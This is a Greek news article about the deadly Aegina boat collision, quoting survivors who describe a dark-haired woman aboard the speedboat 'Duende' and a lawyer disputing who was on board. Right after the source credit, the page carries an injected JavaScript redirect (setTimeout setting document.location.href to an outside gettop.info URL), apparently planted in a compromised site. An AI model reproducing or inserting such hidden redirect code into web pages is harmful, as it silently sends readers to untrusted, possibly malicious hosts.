Αίγινα: Κατάθεσεις για γυναίκα – μυστήριο πάνω στο Ντουέντε

0
22

 

Γυναίκα-μυστήριο με μαύρα μαλλιά, ηλικίας 30 έως 35 ετών, αναφέρεται ως επιβαίνουσα στο ταχύπλοο «Ντουέντε» σε δύο από τις καταθέσεις που περιέχονται στη δικογραφία της υπόθεσης για τη φονική σύγκρουση της Αίγινας.

Δύο από τα θύματα που επέβαιναν στη λάντζα «Αντωνία» αναφέρουν ότι την ώρα που βρίσκονταν στη θάλασσα, δίπλα από τα συντρίμμια του καϊκιού, μπόρεσαν να διακρίνουν μία γυναίκα δίπλα στον καπετάνιο του «Ντουέντε», Θρασύβουλο Λυκουρέζο.

Ο «Ελεύθερος Τύπος» της Κυριακής αποκαλύπτει τις δύο καταθέσεις που έρχονται να προστεθούν στη μαρτυρία του 26χρονου Γιώργου Λαμπρακόπουλου -επίσης επιβάτη του «Αντωνία»- ο οποίος έκανε λόγο για «ζευγάρι μη προχωρημένης ηλικίας».

Ο Αν. Α. καταθέτει: «Βρισκόμασταν μαζί με την οικογένειά μου στην Πέρδικα Αιγίνης και σκοπεύαμε με φιλικό ζευγάρι να περάσουμε με λάντζα στη νήσο Μονή. Επιβιβαστήκαμε στο καΐκι μετά τις 12.00. Λίγη ώρα αργότερα, το σκάφος πήρε και τους τελευταίους επιβάτες. Εγώ με την οικογένειά μου καθόμουν πίσω και δεξιά στο καΐκι μαζί με φιλικό ζευγάρι. Από το σημείο όπου καθόμουν είδα στον ορίζοντα κάποια στιγμή ένα σκάφος. Ανέπτυξε ταχύτητα και πλάναρε επιταχύνοντας διαρκώς. Τότε άρχισαν να φωνάζουν:

“Πού πάει αυτός, ρε, θα μας σκοτώσει”. Ερχόταν με μεγάλη ταχύτητα προς εμάς χωρίς να προσπαθήσει να κάνει ελιγμό αποφυγής. Ξαφνικά βρεθήκαμε στο νερό. Η λάντζα βυθίστηκε αμέσως, παρά τις καλές καιρικές συνθήκες. Τα αντικείμενα των επιβατών έπεσαν στο κεφάλι μας, με αποτέλεσμα να δυσκολεύουν την ανάδυσή μας στην επιφάνεια. Μόλις αναδύθηκα στο νερό και κρατώντας την κόρη μου αγκαλιά είδα τους πρώτους ανθρώπους στο νερό και συνειδητοποίησα ότι η γυναίκα μου και ο γιος μου είχαν βγει στην επιφάνεια. Αμέσως διέκρινα το χειριστή του ταχυπλόου, ο οποίος είχε σταματήσει στα 15 μέτρα από εμάς και μας κοίταζε. Ακουσα τον 10χρονο γιο μου να του φωνάζει: “Ρίξε σωσίβιο, τι μας κοιτάς;”.

Αμέσως το σκάφος αυτό μας εγκατέλειψε συνεχίζοντας την πορεία του. Είδα δύο επιβαίνοντες, τον κατηγορούμενο και μία κοπέλα, η οποία είχε μαύρα μαλλιά και δεν ήταν μεγαλύτερη από τριάντα πέντε ετών. Μετά είδα το φίλο μου μπρούμυτα στο νερό και τον γύρισα ανάποδα με το κεφάλι έξω από το νερό. Δεν είχε τις αισθήσεις του».

Στο ίδιο μήκος κύματος η γυναίκα Αλ. Α. –επιβάτης του «Αντωνία»- αναφέρει: «Ξαφνικά μετά από έναν δυνατό κρότο αντιλήφθηκα ότι βρίσκομαι στη θάλασσα παλεύοντας να κρατηθώ στην επιφάνεια σχεδόν ταυτόχρονα με τον γιο μου. Αφού πιαστήκαμε από τα συντρίμμια του σκάφους, στη συνέχεια γύρισα το βλέμμα τριγύρω και διαπίστωσα την ύπαρξη ενός ταχυπλόου που βρισκόταν σε απόσταση 30 μέτρων. Πάνω επέβαινε ένας άνδρας ηλικίας περίπου 70 ετών και μία κοπέλα που καθόταν δίπλα του ηλικίας περίπου 30 ετών. Αυτό τουλάχιστον ήταν ορατό από το σημείο όπου βρισκόμουν».

Ο δικηγόρος Αλέξης Κούγιας, ο οποίος εκπροσωπεί αρκετά από τα θύματα του ναυαγίου, δηλώνει στον «ΕΤ» της Κυριακής ότι «θα είμαι ικανοποιημένος μόνο όταν διαπιστωθεί ποιοι ήταν μέσα στο σκάφος και ποιος ήταν ο λόγος που εγκατέλειψαν αθώους ανθρώπους, μωρά, φοιτητές και επιστήμονες που θαλασσοπνίγονταν. Η υπόθεση έχει ακόμα πολύ δρόμο».Ο ίδιος με αίτησή του προς την ανακρίτρια Πλημμελειοδικών Πειραιώς, αμφισβητεί ευθέως ότι στο ταχύπλοο επέβαιναν τα ηλικιωμένα άτομα που έχει κατονομάσει ο φερόμενος ως χειριστής του σκάφους, Θρασύβουλος Λυκουρέζος και ζητά τη διαλεύκανση της υπόθεσης. «Εκείνο για το οποίο είμαι βέβαιος είναι ότι στο σκάφος αυτό βρίσκονταν άνθρωπος ή άνθρωποι των οποίων, για κάποιο λόγο που δεν γνωρίζω, δεν έπρεπε να δημοσιοποιηθούν τα ονόματα και οι οποίοι διέφυγαν είτε με φουσκωτό προς την Αίγινα είτε με το σκάφος Ντουέντε ΙΙ» αναφέρει, μεταξύ άλλων, ο κ. Κούγιας.

 

Πηγή: Ελεύθερος Τύπος setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here